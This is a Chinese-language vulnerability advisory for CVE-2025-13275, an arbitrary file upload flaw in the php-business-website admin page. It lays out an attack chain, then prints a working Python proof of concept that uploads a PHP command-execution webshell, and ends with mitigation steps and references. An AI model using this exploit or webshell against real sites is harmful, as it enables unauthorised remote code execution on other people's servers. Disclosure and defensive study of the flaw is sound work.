CVE-2025-13275 Iqbolshoh php-business-website 任意文件上传漏洞

漏洞信息

漏洞编号

CVE-2025-13275

漏洞类型

任意文件上传

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Iqbolshoh php-business-website

漏洞概述

CVE-2025-13275是存在于Iqbolshoh php-business-website项目中的一个中危安全漏洞，CVSS评分4.7。该漏洞位于/admin/about.php文件处，攻击者可利用此漏洞上传任意文件到服务器，无需特殊用户交互即可远程利用。由于该产品采用滚动发布模式，因此无法提供确切的受影响版本范围和修复版本信息。漏洞已于2025年11月17日公开披露， exploit代码已在互联网公开，攻击者可能正在野外利用此漏洞。

技术细节

该漏洞属于任意文件上传（Unrestricted File Upload）类型。攻击者通过/admin/about.php接口，可以上传任意类型的文件而未进行充分的文件类型验证和安全检查。在正常情况下，管理员上传功能应该严格限制可上传文件的类型（如仅允许图片、文档等），并对上传文件进行内容检查、重命名和存储隔离。然而该漏洞点缺少这些安全措施，攻击者可以直接上传恶意文件（如PHP webshell、ASP脚本等），并在服务器上执行任意代码。攻击成功的前提是攻击者具有管理员权限（PR:H），但一旦成功即可获得服务器的完全控制权，实现远程代码执行。

攻击链分析

STEP 1

步骤1

攻击者获取目标网站的管理员权限账户

STEP 2

步骤2

构造恶意文件（PHP webshell、ASP脚本等）

STEP 3

步骤3

使用管理员会话访问/admin/about.php上传端点

STEP 4

步骤4

绕过客户端文件类型检查，上传恶意文件

STEP 5

步骤5

服务器未进行服务端验证，直接保存上传文件

STEP 6

步骤6

访问上传的恶意文件，通过URL参数执行系统命令

STEP 7

步骤7

获得服务器远程代码执行能力，实现完全控制

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-13275 PoC - Unrestricted File Upload in /admin/about.php
# Target: Iqbolshoh php-business-website

def upload_shell(target_url, admin_cookie):
    """
    Upload malicious PHP shell to target server
    """
    upload_url = f"{target_url.rstrip('/')}/admin/about.php"
    
    # PHP webshell payload
    webshell = "<?php if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?>"
    
    files = {
        'file': ('shell.php', webshell, 'application/x-php')
    }
    
    headers = {
        'Cookie': admin_cookie,
        'X-Requested-With': 'XMLHttpRequest'
    }
    
    try:
        response = requests.post(upload_url, files=files, headers=headers, timeout=10)
        print(f"[+] Upload response: {response.status_code}")
        
        # Check if upload was successful
        if response.status_code == 200:
            print("[+] Shell uploaded successfully!")
            print(f"[+] Access shell at: {target_url}/uploads/shell.php?cmd=whoami")
            return True
        else:
            print("[-] Upload failed")
            return False
    except Exception as e:
        print(f"[-] Error: {str(e)}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 3:
        print(f"Usage: python {sys.argv[0]} <target_url> <admin_cookie>")
        print(f"Example: python {sys.argv[0]} http://target.com 'PHPSESSID=xxx'")
        sys.exit(1)
    
    target = sys.argv[1]
    cookie = sys.argv[2]
    upload_shell(target, cookie)

影响范围

Iqbolshoh php-business-website <= 10677743a8dfc281f85291a27cf63a0bce043c24

防御指南

临时缓解措施

在官方修复版本发布之前，可采取以下临时缓解措施：1) 临时禁用/admin/about.php文件上传功能；2) 在Web服务器层面配置，禁止上传目录中的PHP、ASP等脚本文件执行；3) 加强管理员账户安全，使用强密码和多因素认证；4) 监控日志记录文件上传行为，及时发现异常上传活动；5) 限制/admin路径的访问来源，仅允许内部网络访问管理后台。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-13275
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-13275
3 Details https://www.cvedetails.com/cve/CVE-2025-13275/
4 VulDB https://vuldb.com/cve/CVE-2025-13275
5 Link https://github.com/mhszed/Report/blob/main/php-business-website%20upload.docx
6 Link https://vuldb.com/?ctiid.332610
7 Link https://vuldb.com/?id.332610
8 Link https://vuldb.com/?submit.690049